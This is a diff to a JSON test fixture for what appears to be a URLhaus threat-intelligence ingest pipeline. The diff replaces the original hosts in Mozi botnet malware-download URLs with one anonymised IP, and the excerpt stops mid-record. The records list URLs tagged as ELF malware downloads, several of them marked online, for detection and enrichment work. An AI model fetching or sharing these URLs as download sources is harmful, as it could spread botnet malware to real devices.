 "event": {
- "ingested": "2021-12-13T06:08:08.693130445Z",
- "original": "{\"id\":\"961376\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961376/\",\"url\":\"http://183.188.139.70:35251/Mozi.m\",\"url_status\":\"online\",\"host\":\"183.188.139.70\",\"date_added\":\"2021-01-14 20:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.025726600Z",
+ "original": "{\"id\":\"961376\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961376/\",\"url\":\"http://89.160.20.156:35251/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -8269,18 +8269,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://117.222.173.201:50562/Mozi.m",
+ "original": "http://89.160.20.156:50562/Mozi.m",
 "scheme": "http",
 "port": 50562,
- "domain": "117.222.173.201",
- "full": "http://117.222.173.201:50562/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:50562/Mozi.m"
 },
- "ip": "117.222.173.201"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693133391Z",
- "original": "{\"id\":\"961373\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961373/\",\"url\":\"http://117.222.173.201:50562/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.222.173.201\",\"date_added\":\"2021-01-14 20:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.025733600Z",
+ "original": "{\"id\":\"961373\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961373/\",\"url\":\"http://89.160.20.156:50562/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -8318,18 +8318,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://117.215.248.158:33445/Mozi.m",
+ "original": "http://89.160.20.156:33445/Mozi.m",
 "scheme": "http",
 "port": 33445,
- "domain": "117.215.248.158",
- "full": "http://117.215.248.158:33445/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:33445/Mozi.m"
 },
- "ip": "117.215.248.158"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693137118Z",
- "original": "{\"id\":\"961374\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961374/\",\"url\":\"http://117.215.248.158:33445/Mozi.m\",\"url_status\":\"online\",\"host\":\"117.215.248.158\",\"date_added\":\"2021-01-14 20:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.025740500Z",
+ "original": "{\"id\":\"961374\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961374/\",\"url\":\"http://89.160.20.156:33445/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -8367,18 +8367,18 @@
 "url": {
 "path": "/Mozi.a",
 "extension": "a",
- "original": "http://120.85.197.148:60280/Mozi.a",
+ "original": "http://89.160.20.156:60280/Mozi.a",
 "scheme": "http",
 "port": 60280,
- "domain": "120.85.197.148",
- "full": "http://120.85.197.148:60280/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:60280/Mozi.a"
 },
- "ip": "120.85.197.148"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693140845Z",
- "original": "{\"id\":\"961370\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961370/\",\"url\":\"http://120.85.197.148:60280/Mozi.a\",\"url_status\":\"online\",\"host\":\"120.85.197.148\",\"date_added\":\"2021-01-14 20:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.025747400Z",
+ "original": "{\"id\":\"961370\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961370/\",\"url\":\"http://89.160.20.156:60280/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -8416,18 +8416,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://182.126.66.149:46386/Mozi.m",
+ "original": "http://89.160.20.156:46386/Mozi.m",
 "scheme": "http",
 "port": 46386,
- "domain": "182.126.66.149",
- "full": "http://182.126.66.149:46386/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:46386/Mozi.m"
 },
- "ip": "182.126.66.149"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693144392Z",
- "original": "{\"id\":\"961371\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961371/\",\"url\":\"http://182.126.66.149:46386/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.126.66.149\",\"date_added\":\"2021-01-14 20:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.025754200Z",
+ "original": "{\"id\":\"961371\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961371/\",\"url\":\"http://89.160.20.156:46386/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -8465,18 +8465,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://182.113.4.64:60288/Mozi.m",
+ "original": "http://89.160.20.156:60288/Mozi.m",
 "scheme": "http",
 "port": 60288,
- "domain": "182.113.4.64",
- "full": "http://182.113.4.64:60288/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:60288/Mozi.m"
 },
- "ip": "182.113.4.64"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693147858Z",
- "original": "{\"id\":\"961372\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961372/\",\"url\":\"http://182.113.4.64:60288/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.113.4.64\",\"date_added\":\"2021-01-14 20:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.025761200Z",
+ "original": "{\"id\":\"961372\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961372/\",\"url\":\"http://89.160.20.156:60288/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -8514,18 +8514,18 @@
 "url": {
 "path": "/Mozi.a",
 "extension": "a",
- "original": "http://113.116.144.14:49731/Mozi.a",
+ "original": "http://89.160.20.156:49731/Mozi.a",
 "scheme": "http",
 "port": 49731,
- "domain": "113.116.144.14",
- "full": "http://113.116.144.14:49731/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:49731/Mozi.a"
 },
- "ip": "113.116.144.14"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693151084Z",
- "original": "{\"id\":\"961368\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961368/\",\"url\":\"http://113.116.144.14:49731/Mozi.a\",\"url_status\":\"online\",\"host\":\"113.116.144.14\",\"date_added\":\"2021-01-14 20:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.025768200Z",
+ "original": "{\"id\":\"961368\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961368/\",\"url\":\"http://89.160.20.156:49731/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -8563,18 +8563,18 @@
 "url": {
 "path": "/Mozi.a",
 "extension": "a",
- "original": "http://115.56.186.224:38837/Mozi.a",
+ "original": "http://89.160.20.156:38837/Mozi.a",
 "scheme": "http",
 "port": 38837,
- "domain": "115.56.186.224",
- "full": "http://115.56.186.224:38837/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:38837/Mozi.a"
 },
- "ip": "115.56.186.224"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693154491Z",
- "original": "{\"id\":\"961369\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961369/\",\"url\":\"http://115.56.186.224:38837/Mozi.a\",\"url_status\":\"online\",\"host\":\"115.56.186.224\",\"date_added\":\"2021-01-14 20:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.025775100Z",
+ "original": "{\"id\":\"961369\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961369/\",\"url\":\"http://89.160.20.156:38837/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -8612,18 +8612,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://115.48.159.43:37814/Mozi.m",
+ "original": "http://89.160.20.156:37814/Mozi.m",
 "scheme": "http",
 "port": 37814,
- "domain": "115.48.159.43",
- "full": "http://115.48.159.43:37814/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:37814/Mozi.m"
 },
- "ip": "115.48.159.43"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693179947Z",
- "original": "{\"id\":\"961366\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961366/\",\"url\":\"http://115.48.159.43:37814/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.48.159.43\",\"date_added\":\"2021-01-14 20:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.025782Z",
+ "original": "{\"id\":\"961366\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961366/\",\"url\":\"http://89.160.20.156:37814/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -8661,18 +8661,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://115.50.233.247:47507/Mozi.m",
+ "original": "http://89.160.20.156:47507/Mozi.m",
 "scheme": "http",
 "port": 47507,
- "domain": "115.50.233.247",
- "full": "http://115.50.233.247:47507/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:47507/Mozi.m"
 },
- "ip": "115.50.233.247"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693188463Z",
- "original": "{\"id\":\"961367\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961367/\",\"url\":\"http://115.50.233.247:47507/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.50.233.247\",\"date_added\":\"2021-01-14 20:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.025789100Z",
+ "original": "{\"id\":\"961367\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961367/\",\"url\":\"http://89.160.20.156:47507/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -8710,18 +8710,18 @@
 "provider": "geenensp",
 "url": {
 "path": "/i",
- "original": "http://115.58.39.251:47140/i",
+ "original": "http://89.160.20.156:47140/i",
 "scheme": "http",
 "port": 47140,
- "domain": "115.58.39.251",
- "full": "http://115.58.39.251:47140/i"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:47140/i"
 },
- "ip": "115.58.39.251"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693193181Z",
- "original": "{\"id\":\"961365\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961365/\",\"url\":\"http://115.58.39.251:47140/i\",\"url_status\":\"online\",\"host\":\"115.58.39.251\",\"date_added\":\"2021-01-14 20:18:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}",
+ "ingested": "2021-12-13T08:40:08.025795900Z",
+ "original": "{\"id\":\"961365\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961365/\",\"url\":\"http://89.160.20.156:47140/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:18:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -8759,18 +8759,18 @@
 "url": {
 "path": "/Mozi.a",
 "extension": "a",
- "original": "http://42.224.170.54:41514/Mozi.a",
+ "original": "http://89.160.20.156:41514/Mozi.a",
 "scheme": "http",
 "port": 41514,
- "domain": "42.224.170.54",
- "full": "http://42.224.170.54:41514/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:41514/Mozi.a"
 },
- "ip": "42.224.170.54"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693196958Z",
- "original": "{\"id\":\"961363\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961363/\",\"url\":\"http://42.224.170.54:41514/Mozi.a\",\"url_status\":\"online\",\"host\":\"42.224.170.54\",\"date_added\":\"2021-01-14 20:10:11 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.025802900Z",
+ "original": "{\"id\":\"961363\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961363/\",\"url\":\"http://89.160.20.156:41514/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:11 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -8808,18 +8808,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.235.100.87:58748/Mozi.m", + "original": "http://89.160.20.156:58748/Mozi.m", "scheme": "http", "port": 58748, - "domain": "42.235.100.87", - "full": "http://42.235.100.87:58748/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:58748/Mozi.m" }, - "ip": "42.235.100.87" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693200615Z", - "original": "{\"id\":\"961364\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961364/\",\"url\":\"http://42.235.100.87:58748/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.235.100.87\",\"date_added\":\"2021-01-14 20:10:11 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025811100Z", + "original": "{\"id\":\"961364\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961364/\",\"url\":\"http://89.160.20.156:58748/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:11 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -8857,18 +8857,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://175.168.229.209:51183/Mozi.m", + "original": "http://89.160.20.156:51183/Mozi.m", "scheme": "http", "port": 51183, - "domain": "175.168.229.209", - "full": "http://175.168.229.209:51183/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:51183/Mozi.m" }, - "ip": "175.168.229.209" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693204372Z", - "original": "{\"id\":\"961362\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961362/\",\"url\":\"http://175.168.229.209:51183/Mozi.m\",\"url_status\":\"online\",\"host\":\"175.168.229.209\",\"date_added\":\"2021-01-14 20:10:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025818500Z", + "original": "{\"id\":\"961362\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961362/\",\"url\":\"http://89.160.20.156:51183/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -8906,18 +8906,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.119.164.30:42104/Mozi.m", + "original": "http://89.160.20.156:42104/Mozi.m", "scheme": "http", "port": 42104, - "domain": "182.119.164.30", - "full": "http://182.119.164.30:42104/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:42104/Mozi.m" }, - "ip": "182.119.164.30" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693207859Z", - "original": "{\"id\":\"961361\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961361/\",\"url\":\"http://182.119.164.30:42104/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.119.164.30\",\"date_added\":\"2021-01-14 20:10:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025825300Z", + "original": "{\"id\":\"961361\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961361/\",\"url\":\"http://89.160.20.156:42104/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -8955,18 +8955,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.224.52.56:53130/Mozi.m", + "original": "http://89.160.20.156:53130/Mozi.m", "scheme": "http", "port": 53130, - "domain": "42.224.52.56", - "full": "http://42.224.52.56:53130/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:53130/Mozi.m" }, - "ip": "42.224.52.56" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693211786Z", - "original": "{\"id\":\"961354\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961354/\",\"url\":\"http://42.224.52.56:53130/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.224.52.56\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025832200Z", + "original": "{\"id\":\"961354\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961354/\",\"url\":\"http://89.160.20.156:53130/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -9004,18 +9004,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://58.255.134.250:57768/Mozi.m", + "original": "http://89.160.20.156:57768/Mozi.m", "scheme": "http", "port": 57768, - "domain": "58.255.134.250", - "full": "http://58.255.134.250:57768/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57768/Mozi.m" }, - "ip": "58.255.134.250" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693215183Z", - "original": "{\"id\":\"961355\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961355/\",\"url\":\"http://58.255.134.250:57768/Mozi.m\",\"url_status\":\"online\",\"host\":\"58.255.134.250\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025839200Z", + "original": "{\"id\":\"961355\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961355/\",\"url\":\"http://89.160.20.156:57768/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -9053,18 +9053,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.230.54.138:34541/Mozi.m", + "original": "http://89.160.20.156:34541/Mozi.m", "scheme": "http", "port": 34541, - "domain": "42.230.54.138", - "full": "http://42.230.54.138:34541/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34541/Mozi.m" }, - "ip": "42.230.54.138" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693218960Z", - "original": "{\"id\":\"961356\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961356/\",\"url\":\"http://42.230.54.138:34541/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.230.54.138\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025846100Z", + "original": "{\"id\":\"961356\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961356/\",\"url\":\"http://89.160.20.156:34541/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -9102,18 +9102,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://219.156.51.117:51344/Mozi.a", + "original": "http://89.160.20.156:51344/Mozi.a", "scheme": "http", "port": 51344, - "domain": "219.156.51.117", - "full": "http://219.156.51.117:51344/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:51344/Mozi.a" }, - "ip": "219.156.51.117" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693222156Z", - "original": "{\"id\":\"961357\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961357/\",\"url\":\"http://219.156.51.117:51344/Mozi.a\",\"url_status\":\"online\",\"host\":\"219.156.51.117\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not 